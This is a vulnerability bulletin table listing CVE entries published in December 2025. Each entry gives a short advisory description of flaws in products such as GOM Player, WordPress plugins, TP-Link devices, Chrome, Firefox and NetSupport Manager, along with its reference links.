| Gomlab--GOM Player | GOM Player 2.3.90.5360 contains a buffer overflow vulnerability in the equalizer preset name input field that allows attackers to crash the application. Attackers can overwrite the preset name with 260 'A' characters to trigger a buffer overflow and cause application instability. | 2025-12-15 | not yet calculated | CVE-2023-53874 | ExploitDB-51724 GOM Lab Vendor Webpage VulnCheck Advisory: GOM Player 2.3.90.5360 Buffer Overflow via Equalizer Preset Name |
| Gomlab--GOM Player | GOM Player 2.3.90.5360 contains a remote code execution vulnerability in its Internet Explorer component that allows attackers to execute arbitrary code through DNS spoofing. Attackers can redirect victims using a malicious URL shortcut and WebDAV technique to run a reverse shell with SMB server interaction. | 2025-12-15 | not yet calculated | CVE-2023-53875 | ExploitDB-51719 GOM Lab Vendor Webpage VulnCheck Advisory: GOM Player 2.3.90.5360 Remote Code Execution via Insecure IE Component |
| Creativeitem--Academy LMS | Academy LMS 6.1 contains a file upload vulnerability that allows authenticated users to upload malicious SVG files with stored cross-site scripting payloads. Attackers can inject malicious scripts through the profile avatar upload feature by modifying file extensions and embedding executable JavaScript code. | 2025-12-15 | not yet calculated | CVE-2023-53876 | ExploitDB-51702 Academy LMS Product Webpage VulnCheck Advisory: Academy LMS 6.1 Arbitrary File Upload Vulnerability via Profile Settings |
| Phpjabbers--Bus Reservation System | Bus Reservation System 1.1 contains a SQL injection vulnerability in the pickup_id parameter that allows attackers to manipulate database queries. Attackers can exploit boolean-based, error-based, and time-based blind SQL injection techniques to steal information from the database. | 2025-12-15 | not yet calculated | CVE-2023-53877 | ExploitDB-51712 Product Webpage VulnCheck Advisory: Bus Reservation System 1.1 Multiple SQL Injection via pickup_id Parameter |
| Phpjabbers--Member Login Script | Member Login Script 3.3 contains a client-side desynchronization vulnerability that allows attackers to manipulate HTTP request handling by exploiting Content-Length header parsing. Attackers can send crafted POST requests with smuggled secondary requests to potentially bypass server-side request processing controls. | 2025-12-15 | not yet calculated | CVE-2023-53878 | ExploitDB-51710 Product Webpage VulnCheck Advisory: Member Login Script 3.3 Client-Side Request Desynchronization Vulnerability |
| neonguvenlik--NVClient | NVClient 5.0 contains a stack buffer overflow vulnerability in the user configuration contact field that allows attackers to crash the application. Attackers can overwrite 846 bytes of memory by pasting a crafted payload into the contact box, causing a denial of service condition. | 2025-12-15 | not yet calculated | CVE-2023-53879 | ExploitDB-51700 NVClient Product Documentation VulnCheck Advisory: NVClient 5.0 Stack Buffer Overflow Vulnerability via User Configuration |
| Lucee--Lucee | Lucee 5.4.2.17 contains a reflected cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through administrative interface parameters. Attackers can craft specific payloads targeting admin pages like server.cfm and web.cfm to execute arbitrary JavaScript in victim's browser sessions. | 2025-12-15 | not yet calculated | CVE-2023-53880 | ExploitDB-51668 Lucee Product Webpage VulnCheck Advisory: Lucee 5.4.2.17 Authenticated Reflected Cross-Site Scripting via Admin Interfaces |
| Ruijie--ReyeeOS | ReyeeOS 1.204.1614 contains an unencrypted CWMP communication vulnerability that allows attackers to intercept and manipulate device communication through a man-in-the-middle attack. Attackers can create a fake CWMP server to inject and execute arbitrary commands on Ruijie Reyee Cloud devices by exploiting the unprotected HTTP polling requests. | 2025-12-15 | not yet calculated | CVE-2023-53881 | ExploitDB-51642 Ruijie Networks Vendor Hompage VulnCheck Advisory: ReyeeOS 1.204.1614 Man-in-the-Middle Remote Code Execution via CWMP |
| jlexart--JLex GuestBook | JLex GuestBook 1.6.4 contains a reflected cross-site scripting vulnerability in the 'q' URL parameter that allows attackers to inject malicious scripts. Attackers can craft malicious links with XSS payloads to steal session tokens or execute arbitrary JavaScript in victims' browsers. | 2025-12-15 | not yet calculated | CVE-2023-53882 | ExploitDB-51647 JLexArt Vendor Webpage VulnCheck Advisory: JLex GuestBook 1.6.4 Reflected Cross-Site Scripting via URL Parameter |
| Webedition--Webedition CMS | Webedition CMS v2.9.8.8 contains a remote code execution vulnerability that allows authenticated attackers to inject system commands through PHP page creation. Attackers can create a new PHP page with malicious system commands in the description field to execute arbitrary commands on the server. | 2025-12-15 | not yet calculated | CVE-2023-53883 | ExploitDB-51661 webEdition Product Webpage VulnCheck Advisory: Webedition CMS v2.9.8.8 Remote Code Execution via PHP Page Creation |
| Webedition--Webedition CMS | Webedition CMS v2.9.8.8 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files through the media upload feature to inject and execute arbitrary scripts when the file is viewed by other users. | 2025-12-15 | not yet calculated | CVE-2023-53884 | ExploitDB-51662 webEdition Product Webpage VulnCheck Advisory: Webedition CMS v2.9.8.8 Stored Cross-Site Scripting via SVG Upload |
| Webutler--Webutler | Webutler v3.2 contains a remote code execution vulnerability that allows authenticated administrators to upload PHP files with system command execution. Attackers can upload a PHAR file with embedded system commands to the media browser and execute arbitrary commands by accessing the uploaded file. | 2025-12-15 | not yet calculated | CVE-2023-53885 | ExploitDB-51660 WEButler Product Homepage VulnCheck Advisory: Webutler v3.2 Remote Code Execution via Arbitrary File Upload |
| Xlightftpd--Xlight FTP Server | Xlight FTP Server 3.9.3.6 contains a stack buffer overflow vulnerability in the 'Execute Program' configuration that allows attackers to crash the application. Attackers can trigger the vulnerability by inserting 294 characters into the program execution configuration, causing a denial of service condition. | 2025-12-15 | not yet calculated | CVE-2023-53886 | ExploitDB-51665 XLight FTP Server VulnCheck Advisory: Xlight FTP Server 3.9.3.6 Stack Buffer Overflow Vulnerability via Execute Program |
| Zomplog--Zomplog | Zomplog 3.9 contains a cross-site scripting vulnerability that allows authenticated users to inject malicious scripts when creating new pages. Attackers can craft malicious image source and onerror attributes to execute arbitrary JavaScript code in victim's browser. | 2025-12-15 | not yet calculated | CVE-2023-53887 | ExploitDB-51625 Zomplog Archived Product Webpage VulnCheck Advisory: Zomplog 3.9 Cross-Site Scripting Vulnerability via Page Creation |
| Zomplog--Zomplog | Zomplog 3.9 contains a remote code execution vulnerability that allows authenticated attackers to inject and execute arbitrary PHP code through file manipulation endpoints. Attackers can upload malicious JavaScript files, rename them to PHP, and execute system commands by exploiting the saveE and rename actions in the application. | 2025-12-15 | not yet calculated | CVE-2023-53888 | ExploitDB-51624 Zomplog Archived Product Webpage VulnCheck Advisory: Zomplog 3.9 Remote Code Execution via Authenticated File Manipulation |
| Perch--Perch | Perch CMS 3.2 contains a remote code execution vulnerability that allows authenticated administrators to upload arbitrary PHP files through the assets management interface. Attackers can upload a malicious .phar file with embedded system command execution capabilities to execute arbitrary commands on the server. | 2025-12-15 | not yet calculated | CVE-2023-53889 | ExploitDB-51620 Perch Product Webpage VulnCheck Advisory: Perch CMS 3.2 Remote Code Execution via Unrestricted File Upload |
| Perch--Perch | Perch CMS 3.2 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can craft SVG files with script tags that execute when the file is viewed, potentially stealing user session information or performing client-side attacks. | 2025-12-15 | not yet calculated | CVE-2023-53890 | ExploitDB-51621 Perch Product Webpage VulnCheck Advisory: Perch CMS 3.2 Stored Cross-Site Scripting via SVG File Upload |
| blackcat-cms--Blackcat CMS | Blackcat CMS 1.4 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into page content. Attackers can insert JavaScript payloads in the page modification interface that execute when other users view the compromised page. | 2025-12-15 | not yet calculated | CVE-2023-53891 | ExploitDB-51604 BlackCat CMS Product Webpage VulnCheck Advisory: Blackcat CMS 1.4 Stored Cross-Site Scripting via Page Modification |
| blackcat-cms--Blackcat CMS | Blackcat CMS 1.4 contains a remote code execution vulnerability that allows authenticated administrators to upload malicious PHP files through the jquery plugin manager. Attackers can upload a zip file with a PHP shell script and execute arbitrary system commands by accessing the uploaded plugin's PHP file with a 'code' parameter. | 2025-12-15 | not yet calculated | CVE-2023-53892 | ExploitDB-51605 BlackCat CMS Product Webpage VulnCheck Advisory: Blackcat CMS 1.4 Remote Code Execution via Jquery Plugin Manager |
| Ateme--TITAN | Ateme TITAN File 3.9.12.4 contains an authenticated server-side request forgery vulnerability in the job callback URL parameter that allows attackers to bypass network restrictions. Attackers can exploit the unvalidated parameter to initiate file, service, and network enumeration by forcing the application to make HTTP, DNS, or file requests to arbitrary destinations. | 2025-12-15 | not yet calculated | CVE-2023-53893 | ExploitDB-51582 Zero Science Lab Disclosure (ZSL-2023-5781) Ateme Titan Product Webpage VulnCheck Advisory: Ateme TITAN File 3.9 Authenticated Server-Side Request Forgery Vulnerability |
| python-jose--python-jose | In python-jose 3.3.0 (specifically jwe.decrypt), a vulnerability allows an attacker to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression. | 2025-12-17 | not yet calculated | CVE-2024-29370 | https://github.com/mpdavis/python-jose/issues/344 |
| python-jose--python-jose | In jose4j before 0.9.5, an attacker can cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression. | 2025-12-17 | not yet calculated | CVE-2024-29371 | https://bitbucket.org/b_c/jose4j/issues/220/vuln-zip-bomb-attack |
| FNT--FNT | FNT Command 13.4.0 is vulnerable to Code Execution via the C Base Module. | 2025-12-15 | not yet calculated | CVE-2024-44598 | http://fnt.com https://gist.github.com/ZeroBreach-GmbH/e957dc32e72b366894565b7ff03659a4 |
| FNT--FNT | FNT Command 13.4.0 is vulnerable to Directory Traversal. | 2025-12-15 | not yet calculated | CVE-2024-44599 | http://fnt.com https://gist.github.com/ZeroBreach-GmbH/577755034cb5c0423fbb0bba659b915d |
| Anaconda3--Apple | Anaconda3 macOS installers before 2024.06-1 contain a local privilege escalation vulnerability when installed outside the user's home directory. During installation, world-writable files are created and executed with root privileges. This allows a local low-privileged user to inject arbitrary commands, leading to code execution as the root user. | 2025-12-17 | not yet calculated | CVE-2024-46060 | https://m8sec.dev/blog/privilege-escalation-macos-pkg-installers/ https://www.anaconda.com/docs/getting-started/anaconda/release/2024.x#anaconda-2024-06-1 |
| Moniconda3--Apple | Miniconda3 macOS installers before 23.11.0-1 contain a local privilege escalation vulnerability when installed outside the user's home directory. During installation, world-writable files are created and executed with root privileges. This flaw allows a local low-privileged user to inject arbitrary commands, leading to code execution as the root user. | 2025-12-17 | not yet calculated | CVE-2024-46062 | https://m8sec.dev/blog/privilege-escalation-macos-pkg-installers/ https://www.anaconda.com/docs/getting-started/miniconda/release/23.x#miniconda-23-11-0-1 |
| codepeople--Contact Form Email | Authorization Bypass Through User-Controlled Key vulnerability in codepeople Contact Form Email contact-form-to-email allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form Email: from n/a through <= 1.3.60. | 2025-12-18 | not yet calculated | CVE-2025-10019 | https://vdp.patchstack.com/database/Wordpress/Plugin/contact-form-to-email/vulnerability/wordpress-contact-form-email-plugin-1-3-59-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| RTI--Connext Professional | Exposure of Private Personal Information to an Unauthorized Actor vulnerability in RTI Connext Professional (Core Libraries) allows Sniffing Network Traffic.This issue affects Connext Professional: from 7.4.0 before 7.*, from 7.2.0 before 7.3.1. | 2025-12-16 | not yet calculated | CVE-2025-10450 | https://www.rti.com/vulnerabilities/#cve-2025-10450 |
| Govee--H6056 | A flaw in the binding process of Govee's cloud platform and devices allows a remote attacker to bind an existing, online Govee device to the attacker's account, resulting in full control of the device and removal of the device from its legitimate owner's account. The server‑side API allows device association using a set of identifiers: "device", "sku", "type", and a client‑computed "value", that are not cryptographically bound to a secret originating from the device itself. The vulnerability has been verified for the Govee H6056 - lamp device in firmware version 1.08.13, but may affect also other Govee cloud‑connected devices. The vendor is investigating other potentially affected models. The vendor has deployed server-side security enhancements and automatic firmware updates for model H6056. Most of H6056 devices have been successfully patched through automatic updates. Remaining H6056 users with upgradeable hardware versions must manually update firmware through the Govee Home app while keeping their device WiFi-connected. Users should open the Govee Home app, tap their H6056 device card to enter the device details page, tap the settings icon in the upper right corner, navigate to Device Information section (Firmware Version), and tap the Update button to install the security patch immediately. Govee H6056 devices with hardware versions 1.00.10 or 1.00.11 cannot receive firmware update due to hardware limitations. | 2025-12-18 | not yet calculated | CVE-2025-10910 | https://cert.pl/en/posts/2025/12/CVE-2025-10910/ |
| Unknown--Royal Addons for Elementor | The Royal Addons for Elementor WordPress plugin before 1.7.1037 does not have proper authorisation, allowing unauthenticated users to upload media files via the wpr_addons_upload_file action. | 2025-12-15 | not yet calculated | CVE-2025-11363 | https://wpscan.com/vulnerability/b2eadb7a-30a4-44c7-a420-849484faccf4/ |
| ASUS--Armoury Crate | An out-of-bounds read vulnerability has been identified in the asComSvc service. This vulnerability can be triggered by sending specially crafted requests, which may lead to a service crash or partial loss of functionality. This vulnerability only affects ASUS motherboard series products. Refer to the 'Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information. | 2025-12-17 | not yet calculated | CVE-2025-11775 | https://www.asus.com/security-advisory |
| ASUS--B460 series | An uncontrolled resource consumption vulnerability affects certain ASUS motherboards using Intel B460, B560, B660, B760, H410, H510, H610, H470, Z590, Z690, Z790, W480, W680 series chipsets. Exploitation requires physical access to internal expansion slots to install a specially crafted device and supporting software utility, and may lead to uncontrolled resource consumption that increases the risk of unauthorized direct memory access (DMA). Refer to the 'Security Update for UEFI firmware' section on the ASUS Security Advisory for more information. | 2025-12-17 | not yet calculated | CVE-2025-11901 | https://www.asus.com/security-advisory/ |
| Unknown--URL Shortify | The URL Shortify WordPress plugin before 1.11.3 does not sanitize and escape a parameter before outputting it back in the page, leading to a reflected cross site scripting, which could be used against high-privilege users such as admins. | 2025-12-15 | not yet calculated | CVE-2025-12684 | https://wpscan.com/vulnerability/8f1e04c6-8781-4366-99d9-9a59102957cf/ |
| Unknown--Pure WC Variation Swatches | The Pure WC Variation Swatches WordPress plugin through 1.1.7 does not have an authorization check when updating its settings, which could allow any authenticated users to update them. | 2025-12-20 | not yet calculated | CVE-2025-12820 | https://wpscan.com/vulnerability/36ccd54a-265a-44d5-b788-bc14446e3098/ |
| Quest--Coexistence Manager for Notes | Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Quest Coexistence Manager for Notes (Free/Busy Connector modules) allows HTTP Request Smuggling via the Content-Length-Transfer-Encoding (CL.TE) attack vector. This could allow an attacker to bypass access controls, poison web caches, hijack sessions, or trigger unintended internal requests. This issue affects Coexistence Manager for Notes 3.8.2045. Other versions may also be affected. | 2025-12-19 | not yet calculated | CVE-2025-12874 | https://support.quest.com/coexistence-manager-for-notes/3.10 https://sra.io/advisories/ |
| M-Files Corporation--M-Files Server | An information disclosure vulnerability in M-Files Server before versions 25.12.15491.7, 25.8 LTS SR3, 25.2 LTS SR3 and 24.8 LTS SR5 allows an authenticated attacker using M-Files Web to capture session tokens of other active users. | 2025-12-19 | not yet calculated | CVE-2025-13008 | https://product.m-files.com/security-advisories/cve-2025-13008 |
| Unknown--Ocean Modal Window | The Ocean Modal Window WordPress plugin before 2.3.3 is vulnerable to Remote Code Execution via the modal display logic. These modals can be displayed under user-controlled conditions that Editors and Administrators can set (edit_pages capability). The conditions are then executed as part of an eval statement executed on every site page. This leads to remote code execution. | 2025-12-19 | not yet calculated | CVE-2025-13307 | https://wpscan.com/vulnerability/710de342-6fb9-47bd-a40b-7b74fc3c181b/ |
| Unknown--URL Shortify | The URL Shortify WordPress plugin before 1.11.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-12-15 | not yet calculated | CVE-2025-13355 | https://wpscan.com/vulnerability/8581af77-2d72-48e8-9b22-2c36f122473c/ |
| Google Cloud--Dialogflow CX Messenger | An authentication bypass vulnerability in Google Cloud Dialogflow CX Messenger allowed unauthenticated users to interact with restricted chat agents, gaining access to the agents' knowledge and the ability to trigger their intents, by manipulating initialization parameters or crafting specific API requests. All versions after August 20th, 2025 have been updated to protect from this vulnerability. No user action is required for this. | 2025-12-18 | not yet calculated | CVE-2025-13427 | https://docs.cloud.google.com/dialogflow/docs/release-notes#December_11_2025 |
| Rockwell Automation--Micro820, Micro850, Micro870 | A security issue was found in the IPv6 stack in the Micro850 and Micro870 controllers when the controllers received multiple malformed packets during fuzzing. The controllers will go into recoverable fault with fault code 0xFE60. To recover the controller, clear the fault. | 2025-12-15 | not yet calculated | CVE-2025-13823 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1766.html |
| Rockwell Automation--Micro820, Micro850, Micro870 | A security issue exists due to improper handling of malformed CIP packets during fuzzing. The controller enters a hard fault with solid red Fault LED and becomes unresponsive. Upon power cycle, the controller will enter recoverable fault where the MS LED and Fault LED become flashing red and reports fault code 0xF019. To recover, clear the fault. | 2025-12-15 | not yet calculated | CVE-2025-13824 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1766.html |
| Linkding--LinkDing | A vulnerability in the file upload at bookmark + asset rendering pipeline allows an attacker to upload a malicious SVG file with JavaScript content. When an authenticated admin user views the SVG file with embedded JavaScript code of shared bookmark, JavaScript executes in the admin's browser, retrieves the CSRF token, and sends a request to change the admin's password resulting in a full account takeover. | 2025-12-17 | not yet calculated | CVE-2025-14202 | https://www.cve.org/cverecord?id=CVE-2025-14202 |
| Ercom--Cryptobox | CSRF in Ercom Cryptobox administration console allows attacker to trigger some actions on behalf of a Cryptobox administrator. The attack requires the administrator to browse a malicious web site or to click a link while he has an open session on the administration console. | 2025-12-17 | not yet calculated | CVE-2025-14266 | https://info.cryptobox.com/doc/v4.39/4.39.en/#fix2 |
| M-Files Corporation--M-Files Server | Incomplete removal of sensitive information before transfer vulnerability in M-Files Corporation M-Files Server allows data leak exposure affecting versions before 25.12.15491.7 | 2025-12-19 | not yet calculated | CVE-2025-14267 | https://product.m-files.com/security-advisories/cve-2025-14267/ |
| TP-Link Systems Inc.--Tapo C200 V3 | The HTTPS server on Tapo C200 V3 does not properly validate the Content-Length header, which can lead to an integer overflow. An unauthenticated attacker on the same local network segment can send crafted HTTPS requests to trigger excessive memory allocation, causing the device to crash and resulting in denial-of-service (DoS). | 2025-12-20 | not yet calculated | CVE-2025-14299 | https://www.tp-link.com/us/support/download/tapo-c200/v3/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/4849/ |
| TP-Link Systems Inc.--Tapo C200 V3 | The HTTPS service on Tapo C200 V3 exposes a connectAP interface without proper authentication. An unauthenticated attacker on the same local network segment can exploit this to modify the device's Wi-Fi configuration, resulting in loss of connectivity and denial-of-service (DoS). | 2025-12-20 | not yet calculated | CVE-2025-14300 | https://www.tp-link.com/us/support/download/tapo-c200/v3/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/4849/ |
| Roxnor--PopupKit | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Roxnor PopupKit popup-builder-block allows Blind SQL Injection.This issue affects PopupKit: from n/a through <= 2.1.5. | 2025-12-18 | not yet calculated | CVE-2025-14314 | https://vdp.patchstack.com/database/Wordpress/Plugin/popup-builder-block/vulnerability/wordpress-popupkit-plugin-2-1-5-sql-injection-vulnerability?_s_id=cve |
| M-Files Corporation--M-Files Server | Improper access checks in M-Files Server before 25.12.15491.7 allows users to download files through M-Files Web using Web Companion despite Print and Download Prevention module being enabled. | 2025-12-18 | not yet calculated | CVE-2025-14318 | https://product.m-files.com/security-advisories/cve-2025-14318/ |
| HP Inc--Poly G7500 | In limited scenarios, sensitive data might be written to the log file if an admin uses Microsoft Teams Admin Center (TAC) to make device configuration changes. The affected log file is visible only to users with admin credentials. This is limited to Microsoft TAC and does not affect configuration changes made using the provisioning server or the device WebUI. | 2025-12-16 | not yet calculated | CVE-2025-14432 | https://support.hp.com/us-en/document/ish_13612310-13612332-16/hpsbpy04080 |
| Eclipse OMR--Eclipse OMR | In the Eclipse OMR compiler component, since release 0.7.0, an optimization enabled for Eclipse OpenJ9 consumers of OMR on Z processors incorrectly handles NUL (0x00) characters during the Latin-compatible charset (UTF-8, ISO8859-1, ASCII, etc) to IBM-1047/037 translation sequence. This can cause the output byte array to be truncated, discarding the first NUL byte and all subsequent characters, and thereby exposing a possible buffer over-read problem. This issue is fixed in Eclipse OMR version 0.8.0. | 2025-12-15 | not yet calculated | CVE-2025-14549 | https://github.com/eclipse-omr/omr/pull/8073 |
| TP-Link Systems Inc.--Tapo C210 | Exposure of password hashes through an unauthenticated API response in TP-Link Tapo C210 V.1.8 app on iOS and Android, allowing attackers to brute force the password in the local network. Issue can be mitigated through mobile application updates. Device firmware remains unchanged. | 2025-12-16 | not yet calculated | CVE-2025-14553 | https://apps.apple.com/us/app/tp-link-tapo/id1472718009 https://play.google.com/store/apps/details?id=com.tplink.iot https://www.tp-link.com/us/support/faq/4840/ |
| Perforce--Delphix Continuous Compliance | In Delphix Continuous Compliance version 2025.3.0 and later, following a recent bug fix to correctly handle CR+LF (Windows and DOS) End-of-Record (EOR) characters in delimited files, an issue was identified: using an incorrect EOR configuration can cause inaccurate parsing and leave personally identifiable information (PII) unmasked. | 2025-12-20 | not yet calculated | CVE-2025-14591 | https://portal.perforce.com/s/article/TB137 https://portal.perforce.com/s/cve/a91Qi000002fThdIAE/pii-leak-due-to-change-in-eor-handling |
| The Document Foundation--LibreOffice | An Authentication Bypass vulnerability existed where the application bundled an interpreter (Python) that inherits the Transparency, Consent, and Control (TCC) permissions granted by the user to the main application bundle By executing the bundled interpreter directly the attacker's scripts run with the application's TCC privileges In fixed versions parent-constraints are used to allow only the main application to launch interpreter with those permissions This issue affects LibreOffice on macOS: from 25.2 before < 25.2.4. | 2025-12-15 | not yet calculated | CVE-2025-14714 | https://www.libreoffice.org/about-us/security/advisories/cve-2025-14714 |
| WatchGuard--Fireware OS | An Out-of-bounds Write vulnerability in WatchGuard Fireware OS may allow a remote unauthenticated attacker to execute arbitrary code. This vulnerability affects both the Mobile User VPN with IKEv2 and the Branch Office VPN using IKEv2 when configured with a dynamic gateway peer.This vulnerability affects Fireware OS 11.10.2 up to and including 11.12.4_Update1, 12.0 up to and including 12.11.5 and 2025.1 up to and including 2025.1.3. | 2025-12-19 | not yet calculated | CVE-2025-14733 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00027 |
| TP-Link Systems Inc.--WA850RE | Command Injection vulnerability in TP-Link WA850RE (httpd modules) allows authenticated adjacent attacker to inject arbitrary commands.This issue affects: ≤ WA850RE V2_160527, ≤ WA850RE V3_160922. | 2025-12-18 | not yet calculated | CVE-2025-14737 | https://www.tp-link.com/us/support/download/tl-wa850re/v2/#Firmware https://www.tp-link.com/us/support/download/tl-wa850re/v3/#Firmware https://blog.exodusintel.com/2022/06/23/tp-link-wa850re-remote-command-injection-vulnerability/ https://www.tp-link.com/us/support/faq/4848/ |
| TP-Link Systems Inc.--WA850RE | Improper authentication vulnerability in TP-Link WA850RE (httpd modules) allows unauthenticated attackers to download the configuration file.This issue affects: ≤ WA850RE V2_160527, ≤ WA850RE V3_160922. | 2025-12-18 | not yet calculated | CVE-2025-14738 | https://www.tp-link.com/us/support/download/tl-wa850re/v2/#Firmware https://www.tp-link.com/us/support/download/tl-wa850re/v3/#Firmware https://blog.exodusintel.com/2022/06/23/tp-link-wa850re-unauthenticated-configuration-disclosure-vulnerability/ https://www.tp-link.com/us/support/faq/4848/ |
| TP-Link Systems Inc.--WR940N and WR941ND | Access of Uninitialized Pointer vulnerability in TP-Link WR940N and WR941ND allows local unauthenticated attackers the ability to execute DoS attack and potentially arbitrary code execution under the context of the 'root' user.This issue affects WR940N and WR941ND: ≤ WR940N v5 3.20.1 Build 200316, ≤ WR941ND v6 3.16.9 Build 151203. | 2025-12-18 | not yet calculated | CVE-2025-14739 | https://www.tp-link.com/us/support/download/tl-wr941nd/#Firmware https://www.tp-link.com/us/support/download/tl-wr940n/v5/#Firmware https://blog.exodusintel.com/2022/06/23/tp-link-wr940n-wr941nd-uninitialized-pointer-vulnerability/ https://www.tp-link.com/us/support/faq/4848/ |
| Mozilla--Firefox for iOS | Unicode RTLO characters could allow malicious websites to spoof filenames in the downloads UI for Firefox for iOS, potentially tricking users into saving files of an unexpected file type. This vulnerability affects Firefox for iOS < 144.0. | 2025-12-18 | not yet calculated | CVE-2025-14744 | https://bugzilla.mozilla.org/show_bug.cgi?id=1984683 https://www.mozilla.org/security/advisories/mfsa2025-97/ |
| Google--Chrome | Use after free in WebGPU in Google Chrome prior to 143.0.7499.147 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. | 2025-12-16 | not yet calculated | CVE-2025-14765 | https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop_16.html https://issues.chromium.org/issues/448294721 |
| Google--Chrome | Out of bounds read and write in V8 in Google Chrome prior to 143.0.7499.147 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. | 2025-12-16 | not yet calculated | CVE-2025-14766 | https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop_16.html https://issues.chromium.org/issues/466786677 |
| TECNO--Tecno Pova6 Pro 5G | The component com.transsion.tranfacmode.entrance.main.MainActivity in com.transsion.tranfacmode has no permission control and can be accessed by third-party apps which can construct intents to directly open adb debugging functionality without user interaction. | 2025-12-17 | not yet calculated | CVE-2025-14817 | https://security.tecno.com/SRC/securityUpdates https://security.tecno.com/SRC/blogdetail/434?lang=en_US |
| Mozilla--Firefox | Use-after-free in the Disability Access APIs component. This vulnerability affects Firefox < 146.0.1. | 2025-12-18 | not yet calculated | CVE-2025-14860 | https://bugzilla.mozilla.org/show_bug.cgi?id=2000597 https://www.mozilla.org/security/advisories/mfsa2025-98/ |
| Mozilla--Firefox | Memory safety bugs present in Firefox 146. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 146.0.1. | 2025-12-18 | not yet calculated | CVE-2025-14861 | Memory safety bugs fixed in Firefox 146.0.1 https://www.mozilla.org/security/advisories/mfsa2025-98/ |
| pretix--pretix | Multiple API endpoints allowed access to sensitive files from other users by knowing the UUID of the file that were not intended to be accessible by UUID only. | 2025-12-19 | not yet calculated | CVE-2025-14881 | https://pretix.eu/about/en/blog/20251218-release-2025-10-1/ |
| pretix--pretix-offlinesales | An API endpoint allowed access to sensitive files from other users by knowing the UUID of the file that were not intended to be accessible by UUID only. | 2025-12-19 | not yet calculated | CVE-2025-14882 | https://pretix.eu/about/en/blog/20251218-release-2025-10-1/ |
| Johnson Controls--OpenBlue Workplace (formerly FM Systems) | Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information. | 2025-12-17 | not yet calculated | CVE-2025-26381 | https://https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-03 https://tyco.widen.net/view/pdf/xmejieec4b/JCI-PSA-2025-05.pdf?t.download=true&u=aiurfs |
| Linksys-Linksys | A stored cross-site scripting (XSS) vulnerability in the page_save component of Linksys E5600 V1.1.0.26 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the hostname and domainName parameters. | 2025-12-16 | not yet calculated | CVE-2025-29231 | https://github.com/JZP018/Vuln/blob/main/linsys/E5600/XSS_wan_name/XSS_wan_name.md https://github.com/Suryaandave/CVES/tree/main/CVE-2025-29231 |
| NetSupport Software--Manager | NetSupport Manager < 14.12.0001 contains an unauthenticated SQL injection vulnerability in its Connectivity Server/Gateway HTTPS request handling. The server evaluates request URIs using an unsanitized SQLite query against the FileLinks table in gateway.db. By injecting SQL through the LinkName/URI value, a remote attacker can control the FileName field used by the server to read and return files from disk, resulting in arbitrary local file disclosure. | 2025-12-15 | not yet calculated | CVE-2025-34179 | https://kb.netsupportsoftware.com/knowledge-base/updating-and-securing-netsupport-manager/ https://www.vulncheck.com/advisories/netsupport-manager-unauthenticated-sqli-local-file-disclosure https://ret2.me/post/2025-12-04-exploiting-netsupport-gateway/ |
| NetSupport Software--Manager | NetSupport Manager < 14.12.0001 relies on a shared Gateway Key for authentication between Manager/Control, Client, and Connectivity Server components. The key is stored using a reversible encoding scheme. An attacker who obtains access to a deployed client configuration file can decode the stored value to recover the plaintext Gateway Key. Possession of the Gateway Key allows unauthorized access to NetSupport Manager connectivity services and enables remote control of systems managed through the same key. | 2025-12-15 | not yet calculated | CVE-2025-34180 | https://kb.netsupportsoftware.com/knowledge-base/updating-and-securing-netsupport-manager/ https://www.vulncheck.com/advisories/netsupport-manager-gateway-key-reversible-encoding-credential-recovery https://ret2.me/post/2025-12-04-exploiting-netsupport-gateway/ |
| NetSupport Software--Manager | NetSupport Manager < 14.12.0001 contains an arbitrary file write vulnerability in its Connectivity Server/Gateway PUTFILE request handler. An attacker with a valid Gateway Key can supply a crafted filename containing directory traversal sequences to write files to arbitrary locations on the server. This can be leveraged to place attacker-controlled DLLs or executables in privileged paths and achieve remote code execution in the context of the NetSupport Manager connectivity service. | 2025-12-15 | not yet calculated | CVE-2025-34181 | https://kb.netsupportsoftware.com/knowledge-base/updating-and-securing-netsupport-manager/ https://www.vulncheck.com/advisories/netsupport-manager-authenticated-path-traversal-arbitrary-write-rce https://ret2.me/post/2025-12-04-exploiting-netsupport-gateway/ |
| Nagios Enterprises--Nagios XI | Nagios XI versions prior to 2026R1.1 are vulnerable to local privilege escalation due to an unsafe interaction between sudo permissions and application file permissions. A user‑accessible maintenance script may be executed as root via sudo and includes an application file that is writable by a lower‑privileged user. A local attacker with access to the application account can modify this file to introduce malicious code, which is then executed with elevated privileges when the script is run. Successful exploitation results in arbitrary code execution as the root user. | 2025-12-16 | not yet calculated | CVE-2025-34288 | https://www.nagios.com/changelog/nagios-xi/2026r1-1/ https://www.vulncheck.com/advisories/nagios-xi-privilege-escalation-via-writable-php-include-executed-with-sudo |
